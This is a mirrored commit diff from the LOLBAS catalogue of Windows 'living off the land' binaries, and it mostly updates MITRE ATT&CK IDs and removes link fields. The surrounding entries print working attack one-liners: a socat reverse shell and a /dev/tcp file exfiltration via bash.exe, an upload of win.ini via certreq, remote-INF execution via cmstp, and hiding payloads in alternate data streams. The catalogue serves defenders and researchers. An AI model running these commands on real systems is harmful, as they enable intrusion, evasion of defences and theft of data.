mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 06:18:50 +01:00
MITRE ATT&CK realignment sprint
This commit is contained in:
parent
97f5042a58
commit
4f7ec8d2af
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\OEM\Preload\utility
|
- Path: C:\OEM\Preload\utility
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
|
||||||
OperatingSystem: Windows 7 and up with Whatsapp installed
|
OperatingSystem: Windows 7 and up with Whatsapp installed
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: '%localappdata%\Whatsapp\Update.exe'
|
- Path: '%localappdata%\Whatsapp\Update.exe'
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||||
|
@ -9,14 +9,12 @@ Commands:
|
|||||||
Category: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1064
|
MitreID: T1064
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||||
Category: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1064
|
MitreID: T1064
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
|
- c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Binary.exe
|
Name: Binary.exe
|
||||||
Description: Something general about the binary
|
Description: Something general about the binary
|
||||||
Author: The person that created this file
|
Author: The name of the person that created this file
|
||||||
Created: Date the person created this file
|
Created: YYYY-MM-DD (date the person created this file)
|
||||||
Commands:
|
Commands:
|
||||||
- Command: The command
|
- Command: The command
|
||||||
Description: Description of the command
|
Description: Description of the command
|
||||||
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Required privs
|
Privileges: Required privs
|
||||||
MitreID: T1055
|
MitreID: T1055
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
|
|
||||||
OperatingSystem: Windows 10 1803, Windows 10 1703
|
OperatingSystem: Windows 10 1803, Windows 10 1703
|
||||||
- Command: The second command
|
- Command: The second command
|
||||||
Description: Description of the second command
|
Description: Description of the second command
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: Required privs
|
Privileges: Required privs
|
||||||
MitreID: T1033
|
MitreID: T1033
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1033
|
|
||||||
OperatingSystem: Windows 10 All
|
OperatingSystem: Windows 10 All
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\bin.exe
|
- Path: c:\windows\system32\bin.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
|
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Local Admin
|
Privileges: Local Admin
|
||||||
MitreID: T1053
|
MitreID: T1053
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
|
||||||
OperatingSystem: Windows 7 or older
|
OperatingSystem: Windows 7 or older
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\WINDOWS\System32\At.exe
|
- Path: C:\WINDOWS\System32\At.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Atbroker.exe
|
- Path: C:\Windows\System32\Atbroker.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
|
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
|
||||||
Description: Executes a reverseshell
|
Description: Executes a reverseshell
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
|
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
|
||||||
Description: Exfiltrate data
|
Description: Exfiltrate data
|
||||||
@ -26,7 +24,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: bash.exe -c calc.exe
|
- Command: bash.exe -c calc.exe
|
||||||
Description: Executes calc.exe from bash.exe
|
Description: Executes calc.exe from bash.exe
|
||||||
@ -34,7 +31,6 @@ Commands:
|
|||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\bash.exe
|
- Path: C:\Windows\System32\bash.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
|
Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
|
- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
|
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
|
||||||
Description: Command for copying cmd.exe to another folder
|
Description: Command for copying cmd.exe to another folder
|
||||||
@ -26,7 +24,6 @@ Commands:
|
|||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
|
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
|
||||||
Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||||
@ -34,7 +31,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\bitsadmin.exe
|
- Path: C:\Windows\System32\bitsadmin.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
|
||||||
OperatingSystem: Windows Server 2022
|
OperatingSystem: Windows Server 2022
|
||||||
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
|
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
|
||||||
Description: Downloads text formatted files
|
Description: Downloads text formatted files
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1105/
|
|
||||||
OperatingSystem: Windows Server 2022
|
OperatingSystem: Windows Server 2022
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\certoc.exe
|
- Path: c:\windows\system32\certoc.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
|
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
|
||||||
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
|
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Upload
|
Category: Upload
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\certreq.exe
|
- Path: C:\Windows\System32\certreq.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
- Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||||
Description: Download and save 7zip to disk in the current folder.
|
Description: Download and save 7zip to disk in the current folder.
|
||||||
@ -18,15 +17,13 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
||||||
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
|
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
|
||||||
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
|
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: certutil -encode inputFileName encodedOutputFileName
|
- Command: certutil -encode inputFileName encodedOutputFileName
|
||||||
Description: Command to encode a file using Base64
|
Description: Command to encode a file using Base64
|
||||||
@ -34,7 +31,6 @@ Commands:
|
|||||||
Category: Encode
|
Category: Encode
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1027
|
MitreID: T1027
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1027
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: certutil -decode encodedInputFileName decodedOutputFileName
|
- Command: certutil -decode encodedInputFileName decodedOutputFileName
|
||||||
Description: Command to decode a Base64 encoded file.
|
Description: Command to decode a Base64 encoded file.
|
||||||
@ -42,7 +38,6 @@ Commands:
|
|||||||
Category: Decode
|
Category: Decode
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1140
|
MitreID: T1140
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||||
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
||||||
@ -50,7 +45,6 @@ Commands:
|
|||||||
Category: Decode
|
Category: Decode
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1140
|
MitreID: T1140
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\certutil.exe
|
- Path: C:\Windows\System32\certutil.exe
|
||||||
|
@ -9,16 +9,14 @@ Commands:
|
|||||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1170
|
MitreID: T1059.003
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: cmd.exe - < fakefile.doc:payload.bat
|
- Command: cmd.exe - < fakefile.doc:payload.bat
|
||||||
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
|
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
|
||||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1170
|
MitreID: T1059.003
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmd.exe
|
- Path: C:\Windows\System32\cmd.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Credentials
|
Category: Credentials
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1078
|
MitreID: T1078
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmdkey.exe
|
- Path: C:\Windows\System32\cmdkey.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1105/
|
|
||||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmdl32.exe
|
- Path: C:\Windows\System32\cmdl32.exe
|
||||||
|
@ -9,16 +9,14 @@ Commands:
|
|||||||
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1191
|
MitreID: T1218.003
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||||
Category: AwL bypass
|
Category: AwL bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1191
|
MitreID: T1218.003
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmstp.exe
|
- Path: C:\Windows\System32\cmstp.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Upload
|
Category: Upload
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1567
|
MitreID: T1567
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1567/
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1196
|
MitreID: T1218.002
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1196
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\control.exe
|
- Path: C:\Windows\System32\control.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: csc -target:library File.cs
|
- Command: csc -target:library File.cs
|
||||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
|
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cscript.exe
|
- Path: C:\Windows\System32\cscript.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Upload
|
Category: Upload
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1567
|
MitreID: T1567
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1567/
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1105/
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\desktopimgdownldr.exe
|
- Path: c:\windows\system32\desktopimgdownldr.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Hide data compressed into an Alternate Data Stream.
|
Usecase: Hide data compressed into an Alternate Data Stream.
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
